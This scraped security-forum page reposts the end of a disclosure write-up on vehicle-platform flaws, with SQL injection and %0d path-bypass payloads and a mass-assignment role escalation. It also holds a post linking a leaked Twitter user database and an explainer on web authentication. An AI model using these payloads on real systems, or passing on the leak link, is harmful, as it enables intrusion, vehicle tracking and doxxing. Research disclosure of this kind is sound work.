targets to hack on, we found the company Spireon. In the early 90s and 2000s, there were a few companies like OnStar, Goldstar, and FleetLocate which were standalone devices which were put into vehicles to track and manage them. The devices have the capabilities to be tracked and receive arbitrary commands, e.g. locking the starter so the vehicle cannot start. Sometime in the past, Spireon had acquired many GPS Vehicle Tracking and Management Companies and put them under the Spireon parent company. We read through the Spireon marketing and saw that they claimed to have over 15 million connected vehicles. They offered services directly to customers and additionally many services through their subsidiary companies like OnStar. We decided to research them as, if an attacker were able to compromise the administration functionality for these devices and fleets, they would be able to perform actions against over 15 million vehicles with very interesting functionalities like sending a cities police officers a dispatch location, disabling vehicle starters, and accessing financial loan information for dealers. Our first target for this was very obvious: admin.spireon.com The website appeared to be a very out of date global administration portal for Spireon employees to authenticate and perform some sort of action. We attempted to identify interesting endpoints which were accessible without authorization, but kept getting redirected back to the login. Since the website was so old, we tried the trusted manual SQL injection payloads but were kicked out by a WAF that was installed on the system We switched to a much simpler payload: sending an apostrophe, seeing if we got an error, then sending two apostrophes and seeing if we did not get an error. This worked! The system appeared to be reacting to sending an odd versus even number of apostrophes. This indicated that our input in both the username and password field was being passed to a system which could likely be vulnerable to some sort of SQL injection attack. For the username field, we came up with a very simple payload: victim' # The above payload was designed to simply cut off the password check from the SQL query. We sent this HTTP request to Burp Suite’s intruder with a common username list and observed that we received various 301 redirects to “/dashboard” for the username “administrator” and “admin”. After manually sending the HTTP request using the admin username, we observed that we were authenticated into the Spireon administrator portal as an administrator user. At this point, we browsed around the application and saw many interesting endpoints. The functionality was designed to manage Spireon devices remotely. The administrator user had access to all Spireon devices, including those of OnStar, GoldStar, and FleetLocate. We could query these devices and retrieve the live location of whatever the devices were installed on, and additionally send arbitrary commands to these devices. There was additional functionality to overwrite the device configuration including what servers it reached out to download updated firmware. Using this portal, an attacker could create a malicious Spireon package, update the vehicle configuration to call out to the modified package, then download and install the modified Spireon software. At this point, an attacker could backdoor the Spireon device and run arbitrary commands against the device. Since these devices were very ubiquitous and were installed on things like tractors, golf carts, police cars, and ambulances, the impact of each device differed. For some, we could only access the live GPS location of the device, but for others we could disable the starter and send police and ambulance dispatch locations. We reported the vulnerability immediately, but during testing, we observed an HTTP 500 error which disclosed the API URL of the backend API endpoint that the “admin.spireon.com” service reached out to. Initially, we dismissed this as we assumed it was internal, but after circling back we observed that we could hit the endpoint and it would trigger an HTTP 403 forbidden error. Our goal now was seeing if we could find some sort of authorization bypass on the host and what endpoints were accessible. By bypassing the administrator UI, we could directly reach out to each device and have direct queries for vehicles and user accounts via the backend API calls. We fuzzed the host and eventually observed some weird behavior: By sending any string with “admin” or “dashboard”, the system would trigger an HTTP 403 forbidden response, but would return 404 if we didn’t include this string. As an example, if we attempted to load “/anything-admin-anything” we’d receive 403 forbidden, while if we attempted to load “/anything-anything” it would return a 404. We took the blacklisted strings, put them in a list, then attempted to enumerate the specific endpoints with fuzzing characters (%00 to %FF) stuck behind the first and last characters. During scanning, we saw that the following HTTP requests would return a 200 OK response: GET /%0dadmin GET /%0ddashboard Through Burp Suite, we sent the HTTP response to our browser and observed the response: it was a full administrative portal for the core Spireon app. We quickly set up a match and replace rule to modify GET /admin and GET /dashboard to the endpoints with the %0d prefix. After setting up this rule, we could browse to “/admin” or “/dashboard” and explore the website without having to perform any additional steps. We observed that there were dozens of endpoints which were used to query all connected vehicles, send arbitrary commands to connected vehicles, and view all customer tenant accounts, fleet accounts, and customer accounts. We had access to everything. At this point, a malicious actor could backdoor the 15 million devices, query what ownership information was associated with a specific VIN, retrieve the full user information for all customer accounts, and invite themselves to manage any fleet which was connected to the app. For our proof of concept, we invited ourselves to a random fleet account and saw that we received an invitation to administrate a US Police Department where we could track the entire police fleet. (6) Mass Assignment on Reviver allows an Attacker to Remotely Track and Overwrite the Virtual License Plates for All Reviver Customers, Track and Administrate Reviver Fleets, and Access, Modify, and Delete All User Information In October, 2022, California announced that it had legalized digital license plates. We researched this for a while and found that most, if not all of the digital license plates, were done through a company called Reviver. If someone wanted a digital license plate, they’d buy the virtual Reviver license plate which included a SIM card for remotely tracking and updating the license plate. Customers who uses Reviver could remotely update their license plates slogan, background, and additionally report if the car had been stolen via setting the plate tag to “STOLEN”. Since the license plate could be used to track vehicles, we were super interested in Reviver and began auditing the mobile app. We proxied the HTTP traffic and saw that all API functionality was done on the "pr-api.rplate.com" website. After creating a user account, our user account was assigned to a unique “company” JSON object which allowed us to add other sub-users to our account. The company JSON object was super interesting as we could update many of the JSON fields within the object. One of these fields was called “type” and was default set to “CONSUMER”. After noticing this, we dug through the app source code in hopes that we could find another value to set it to, but were unsuccessful. At this point, we took a step back and wondered if there was an actual website we could talk to versus proxying traffic through the mobile app. We looked online for a while before getting the idea to perform a reset password on our account which gave us a URL to navigate to. Once we opened the password reset URL, we observed that the website had tons of functionality including the ability to administer vehicles, fleets, and user accounts. This was super interesting as we now had a lot more API endpoints and functionality to access. Additionally, the JavaScript on the website appeared to have the names of the other roles that our user account could be (e.g. specialized names for user, moderator, admin, etc.) We queried the “CONSUMER” string in the JavaScript and saw that there were other roles that were defined in the JavaScript. After attempting to update our “role” parameter to the disclosed “CORPORATE” role, we refreshed out profile metadata, then saw that it was successful! We were able to change our roles to ones other than the default user account, opening the door to potential privilige escalation vulnerabilities. It appeared that, even though we had updated our account to the "CORPORATE" role, we were still receiving authorization vulnerabilities when logging into the website. We thought for a while until realizing that we could invite users to our modified account which had the elevated role, which may then grant the invited users the required permissions since they were invited via an intended way versus mass assigning an account to an elevated role. After inviting a new account, accepting the invitation, and logging into the account, we observed that we no longer received authorization errors and could access fleet management functionality. This meant that we could likely (1) mass assign our account to an even higher elevated role (e.g. admin), then (2) invite a user to our account which would be assigned the appropriate permissions. This perplexed us as there was likely some administration group which existed in the system but that we had not yet identified. We brute forced the “type” parameter using wordlists until we noticed that setting our group to the number “4” had updated our role to “REVIVER_ROLE”. It appeared that the roles were indexed to numbers, and we could simply run through the numbers 0-100 and find all the roles on the website. The “0” role was the string “REVIVER”, and after setting this on our account and re-inviting a new user, we logged into the website normally and observed that the UI was completely broken and we couldn’t click any buttons. From what we could guess, we had the administrator role but were accessing the account using the customer facing frontend website and not the appropriate administrator frontend website. We would have to find the endpoints used by administrators ourselves. Since our administrator account theoretically had elevated permissions, our first test was simply querying a user account and seeing if we could access someone else's data: this worked! We could take any of the normal API calls (viewing vehicle location, updating vehicle plates, adding new users to accounts) and perform the action using our super administrator account with full authorization. At this point, we reported the vulnerability and observed that it was patched in under 24 hours. An actual attacker could remotely update, track, or delete anyone’s REVIVER plate. We could additionally access any dealer (e.g. Mercedes-Benz dealerships will often package REVIVER plates) and update the default image used by the dealer when the newly purchased vehicle still had DEALER tags. The Reviver website also offered fleet management functionality which we had full access to. (7) Full Remote Vehicle Access and Full Account Takeover affecting Hyundai and Genesis This vulnerability was written up on Twitter and can be accessed on the following thread: (8) Full Remote Vehicle Access and Full Account Takeover affecting Honda, Nissan, Infiniti, Acura This vulnerability was written up on Twitter and can be accessed on the following thread: (9) Full Vehicle Takeover on Nissan via Mass Assignment This vulnerability was written up on Twitter and can be accessed on the following thread: Credits The following people contributed towards this project: Sam Curry (https://twitter.com/samwcyo) Neiko Rivera (https://twitter.com/_specters_) Brett Buerhaus (https://twitter.com/bbuerhaus) Maik Robert (https://twitter.com/xEHLE_) Ian Carroll (https://twitter.com/iangcarroll) Justin Rhinehart (https://twitter.com/sshell_) Shubham Shah (https://twitter.com/infosec_au) Special thanks to the following people who helped create this blog post: Ben Sadeghipour (https://twitter.com/nahamsec) Joseph Thacker (https://twitter.com/rez0__) Sursa: https://samcurry.net/web-hackers-vs-the-auto-industry/
-
- 4
-
Twitter database leaks for free with 235,000,000 records. The database contains 235,000,000 unique records of Twitter users and their email addresses and will unfortunately lead to a lot of hacking, targeted phishing, and doxxing. This is one of the most significant leaks ever. BF: https://breached.vc/Thread-Twitter-DB-Scrape-Leak-200-Mill-Lines?highlight=twitter
-
- 1
-
Research despre companie si alte companii care apartin aceluiasi grup si Google (e.g. inurl).
-
Modreveal – Utility to find hidden Linux kernel modules
Nytro replied to Kev's topic in Programe utile
Nu face mare lucru dar poate fi util in CTF-uri de exemplu sau in cazuri de dumb rootkits. -
Noroc, nu cred ca l-am vazut folosit niciunde, eu l-as ignora complet.
-
CVE-2022-33679 - Windows Kerberos Elevation of Privilege Vulnerability
Nytro replied to Nytro's topic in Exploituri
Da, cred ca majoritatea problemelor din Windows vin de la porcarii de genul asta, scrise acum 30 de ani. -
James Chiappetta Oct 31 A Dive Into Web Application Authentication A closer look into Web Application Authentication and what it means at a basic level for consumers and businesses. By: James Chiappetta, with guest contributions from Jeremy Shulman Disclaimers: The opinions stated here are the authors’ own, not necessarily those of past, current, or future employers. The mentioning of books, tools, websites, and/or products/services are not formal endorsements and the authors have not taken any incentives to mention them. Recommendations are based on past experiences and not a reflection of future ones. Background Take a moment and ask yourself, 10 years ago, which applications did you use that you still use today? Now think about how you authenticated to those apps, was Multifactor Authentication (MFA) an option? In recent years, authentication implementations have matured, for example many companies have made MFA mandatory. We will take a look why some of these changes have occurred and at application authentication more broadly. It’s useful to understand where we are today, how we got here, and where we may be in 10 years. Web Authentication Authentication Explained First Things First Innovation is something that happens naturally and gradually for various problem/solution pairs. There are usually very passionate people on both ends of a problem. One end agitates the problem while the other end works to create or improve upon solutions. As this relates here, authentication is a vital function for nearly all consumer and business applications. To get to the heart of what authentication is, here is what we will we cover: What is authentication and how is it different from authorization? Why do we need multifactor authentication? How does “sign in with” work (hint: OAuth 2.0) and should you use it? What is Single Sign On (SSO)? What is Passwordless Authentication? What is API Authentication? Bonus: What are Deep Links? Let’s get to it! What is Authentication and how is it different from Authorization? Authentication vs Authorization — Simply put, Authentication is the process an application performs to verify an identity’s credentials are valid. If valid, the user or system will be moved onto the next step which is typically an authorization check. Authorization is distinctly different from authentication and is a process to determine if a valid identity has access to a specific resource. Typical Authentication Example — You must be thinking, well how does an application know who I am? Obviously, you would need to be registered with the application first. Here is a basic example: Let’s say you want to subscribe to a new online service that will send you a different jelly each month. You navigate to the website and select the “create a new account” option. You pick your username and then set a password. You will likely need to provide an email and prove ownership of it. There you have it, you now have a registered identity in the application and can further enter your personal information to receive your jelly each month. Passwords — These are secrets set for each unique identity of an application. The problem with passwords, and passcodes for that matter, is that they are set by humans and humans often will seek the path of least resistance. Think of a sticky note on your grandma’s monitor. Passwords often get reused across many applications, set so they are easier to remember, and stored in insecure locations. This is why a second factor in the authentication process has become commonplace (more on this next). Super Basic Web Authentication Flow with MFA Pro tip: Back to Authorization for a second. Authorization describes what access you have. So it’s important to remember that it’s not just “what you have access to” but also “what data you can leverage with the access”. Fetching a specific person’s name is different than being able to fetch every person’s name. Why do we need MFA? In 2012 and LinkedIn reported one of the largest data breaches of the time occurred. Nearly 6.5 million passwords that they knew about became compromised. About 4 years later they discovered another 100 million were actually compromised. This was one of many credential breaches that can be searched on Troy Hunt’s Have I Been Pwned (HIBP) database of hundreds of millions of records. Unfortunately, this is just a fraction of the billions of leaked credentials floating out there. This has translated to a rise in credential stuffing attacks, where a known set of credentials from a compromised service are used on a completely separate one. The industry is seeing double digit growth in these attacks each year. Companies and consumers are usually both on the losing end of these attacks. What is MFA? Multifactor Authentication (MFA) — Enter the obvious solution, Multifactor Authentication (MFA). MFA is a common technique to prevent attackers from gaining access to user accounts even if credentials (username+password) are known or guessed. The impact of antiquated password policies has been known for a while and NIST is helping catch things up with their 800–63B publication. The idea behind MFA is to use at least two different factors for authentication. The three common factors used for MFA: 1) something you know, like a passcode, in addition to your password 2) something you have, like a soft token (software on your phone) or hard token (USB key) 3) something you are, like a biometric (face, eye, finger, or speech). Current state of MFA — Back to 2012, there weren’t many companies actively considering implementing MFA. Yet, here we are 10 years later with near ubiquity around its adoption. We can partly attribute security breaches in widely used platforms like LinkedIn and games like Fortnite for this. That of course doesn’t mean the end users are enabling it. A simple Google search trend analysis would help illustrate interest in MFA over time. Source: Google Trends Challenges with MFA — We are in a far different spot because of the security events that have transpired over the past 10 years. Our guess is that many generations now know what MFA is and use it in some way today. MFA is here to stay for now and we will see it continue to evolve. A focus on a better end-user experience will be key to its increased adoption as other solutions like Passwordless mature. More on that later. That all said, with any technology, there are challenges. Here are a few with MFA to be aware of: Consumer Adoption — Despite the billions of brute force attacks happening each year, people still don’t think the risk/reward of enabling MFA makes sense. Phishing Scams/Smishing — There are nearly endless counts of phishing attempts happening each day. Attackers have kept up with advancements in security measures and still can convince users to provide their multifactor token. Obviously, never provide anyone with any authentication tokens or secrets. MFA Push Fatigue — Those using an authentication app that supports notifications for approving a login attempt are susceptible to this. It happens when an attacker has user credentials and they spam the user with MFA requests, in hopes they click approve to make the notifications go away. Device Compatibility — Not everyone has a smartphone and this means they can’t install an authentication app for soft tokens or MFA push notifications. This means SMS or a hard token are the only options which come with trade offs. There is a wonderful list of scenarios maintained by NIST and some implementation guidance by Okta for further reading. Pro tips: For the software developers and engineers potentially reading this: It’s easy to make something that should be simple, like authentication, complicated. Don’t make it complicated. Avoid adding any business logic in your Authentication flows. MFA bypasses based on a specific identity/username (think “testuser”) is a common mistake. Hardware tokens (something you have) remain one of the strongest multifactor solutions today but have a high operational overhead and can be lost. Pick where you want to use this based on risk. How does “Sign In With” Work? If you are reading this article, I would hazard a guess that you have seen “sign in with” on various websites. Medium’s Sign in with page Heck, even Medium has this feature. This is where you would use your already established identity with another application, such as Google, Facebook, Apple, or the like, to authenticate to another application. This is possible because of widely adopted industry standards like OAuth2 and OIDC which are used for authentication. It is worth noting that OAuth2 was purely designed as an authorization protocol and not authentication. These two terms are often confused. The kind folks in the OAuth2 community have done a fine job walking through this here. This sign in with capability is possible because you are authenticating once with your Google account and then establishing a trust relationship between Google and whatever the third party application is to allow access (authorized) to that application post-authentication. Super Basic “Sign In With” Flow Is it safe? — Generally, yes, it’s safe when implemented correctly, however there are a large quantity of threat scenarios to consider which unfortunately manifest in the real world (1) (2) (3). One of the biggest issues in these flows is the implicit trust that sign in providers have, meaning applications generally trust the data in Google/Facebook/Apple to be true and accurate. The implementation isn’t just the only thing to be concerned with but the permissions across the two systems is also important. The service you are looking to sign in to may request access to your personal data, so look out for what applications are requesting. You should also periodically review and prune based on usage. What is Single Sign On (SSO)? Hopefully you have read the previous section about “sign in with”. The concept is quite similar, but usually in practice Single Sign On (SSO) uses a different protocol, called SAML 2.0, to perform the authentication between the identity provider, idP, (Google in the previous section) and the service provider, SP, (third party application you want to access). SAML 2.0 is very similar in concept to OAuth 2.0 in that it requires an exchange of identity information between trusted parties. applications. If you want your users to have accounts on many different services, and selectively grant access to various applications, use OAuth (application focused). SSO is usually employed for business to business applications. This enables business users to maintain a single account and access many applications with it. There are quite large organizations that specialize in SSO as a product. One of the biggest is Okta. Super Basic SSO SAML Flow Pro Tip: Many businesses have decided to charge for SSO, despite it being an implementation of an industry standard. Feel free to peruse some known companies that do this at https://sso.tax/. What is Passwordless Authentication? The concept of “Passwordless” authentication is to use a non-password factor (see above in the MFA section for the list of common factors) as your primary factor for authentication instead of a password. In movies this is often a retinal scan, because it looks cool. In reality, there is Apple PassKey which is now accepted as a primary factor for consumers. This is indeed a strong way to ensure the requesting user owns the credentials being provided to the system. However, there are some drawbacks with this. Currently, there is a very high and difficult bar to implement passwordless authentication at scale. The cost benefit analysis tips towards those with lots of privileged access in organizations, similar to hard tokens. Furthermore, the most likely passwordless factor is biometric, which raises privacy, accuracy, data storage concerns. A human’s biometrics can’t be changed if compromised. Microsoft has a detailed write up on how their Passwordless implementation works, with pictures of course. The FIDO (Fast IDentity Online) Alliance is focused on helping with open authentication standards that reduce password based authentication. The FIDO2 standard incorporates the web authentication (WebAuthn) standard, which we have written about on this blog. Pro Tip: We think for consumers passwordless authentication is still over the horizon, though Microsoft is getting close. For business users, we think players in the space are getting close, but really for only specific and highly privileged users. What is API Authentication? Let’s first start with: What is an API — Back to the jelly of the month subscription application example again. Let’s assume that the jelly of the month service has a feature to enroll you into a jelly enthusiast weekly newsletter that is provided by a third party. In order to subscribe to the newsletter, the jelly website will pass your email address to an API (application programming interfaces) that the newsletter makes available. This API will validate the jelly of the month website using some form of authentication. Super Basic API Authentication Flow Amazon Web Services (AWS) is one of the most prolific examples of APIs we can think of. It is an immense collection of APIs that its customers can use, mainly through HTTP, which is core to the internet. These APIs are designed to be accessible to the public internet. While they may be open to the broader internet, they require an identity to access, unless a resource is explicitly made open, such as static images for a marketing website. OK, now onto API authentication… Basic Authentication — As indicated by its name, basic Authentication is basic. This means it’s a username and a password, that’s all. The username and password will be base64 encoded and added as an HTTP header for the server to decode and validate. Note: Encoding is NOT encryption. This is why TLS (HTTPS) is important. OAuth 2.0 Access Tokens — As mentioned earlier, OAuth is a standard protocol used for authorization but in the case of APIs, used in a specific way in the authentication flow of APIs. OAuth has what is known as access tokens, also known as JWT bearer tokens, which are provided by an OAuth Authorization server. There is a wonderful post by Nordic APIs on how this all works. These tokens authorize a relying party to act on behalf of those for whom the token is issued to. They are frequently used to access user profile information such as the user’s name and email address. Mutual TLS (mTLS) — mTLS allows for each party in a connection, the client and the server, to verify each others’ identities. This form of Authentication leverages public key cryptography and the TLS encryption protocol. Trust is acquired from known certificate authorities. This differs from TLS where only the server provides its identity for verification by the client. More on the differences here. Pro Tip: In practice you may see additional security controls placed on APIs, such as IP address or system based restrictions. This is not Authentication and should be treated as a secondary factor. Bonus: What are Deep Links? What happens when you try to access your email and you’re not logged in? You get redirected to the login page. After logging in, though, you are seamlessly redirected back to your email without having to manually navigate. How does this work? Enter deep links. Deep links — A service provider/relying party user experience implementation detail. They allow a user to be sent directly to a specific application and/or page post-Authentication. Deep links are not explicitly part of the Authentication specs we have discussed but all said specs have a means of supporting them via a pseudo-session state. In SAML2, this is the “RelayState” parameter. In OAuth2/OIDC, this is the “state” parameter. An identity provider or Authorization server will always send this value back to the service provider/relying party post-Authentication. Deep links are a type of link that sends users directly to an app instead of a website or a store. They are used to send users straight to specific in-app locations, saving users the time and energy locating a particular page themselves — significantly improving the user experience. Deep linking does this by specifying a custom URL scheme (iOS Universal Links) or an intent URL (on Android devices) that opens your app if it’s already installed. Deep links can also be set to direct users to specific events or pages, which could tie into campaigns that you may want to run. Pro tip: Deep Links and any Authentication flow for that matter can be fraught with security considerations that need to be accounted for. Issues such as open redirects, cross site request Forgeries, and clickjacking are serious concerns with Authentication. Takeaways Authentication is a simple process to validate a registered identity within an application. There are a lot of security implications with getting authentication wrong, which is why getting it right is so important. Authorization is not authentication. It is the process to confirm an authenticated identity has access to something. Passwords alone are no longer adequate to keep applications secure. MFA is here to stay for now and needs serious consideration by those companies who haven’t implemented it yet. For the strongest MFA today, use a hard token, but know that comes at a high management cost. There is a lot of behind the scenes magic that happens to make authentication as frictionless as possible. The use of “sign in with” and Single Sign On (SSO) are becoming more widely adopted, which is fine, but be sure you review the permissions and data of each application. We are eager for a phishing resistant and passwordless authentication solution, but there are a lot of challenges ahead to finding the right balance between cost and reward. Innovations that are happening today with FIDO2, Web Authn, and privacy standards are beginning to help. Even more complicated authentication work flows, like deep links, make it convenient for the end user to get to resources but can be vulnerable to many different issues. For the security practitioners reading, we recommend you find the time reviewing your company’s authentication implementations. Words of Wisdom Authentication isn’t something we simply can’t ignore. Despite the collective decades of experience implementing and securing Authentication for companies, we remain with a feeling of continued curiosity as it evolves over time. The only true wisdom is in knowing you know nothing. — Socrates Contributions and Thanks A special thanks to those who helped peer review and make this post as useful as it is: Marshall Hallenbeck, Keshav Malik, Abishek Patole, Evan Helbig, Byron Arnao, Sean McConnell, Luke Young, and Anand Vemuri. A special thanks to you, the reader. We hope you benefited from it in some way and we want everyone to be successful at this. While these posts aren’t a silver bullet, we hope they get you started. Please do follow our page if you enjoy this and our other posts. More to come! Sursa: https://betterappsec.com/a-medium-dive-into-web-application-authentication-342d1d002a61
-
- 1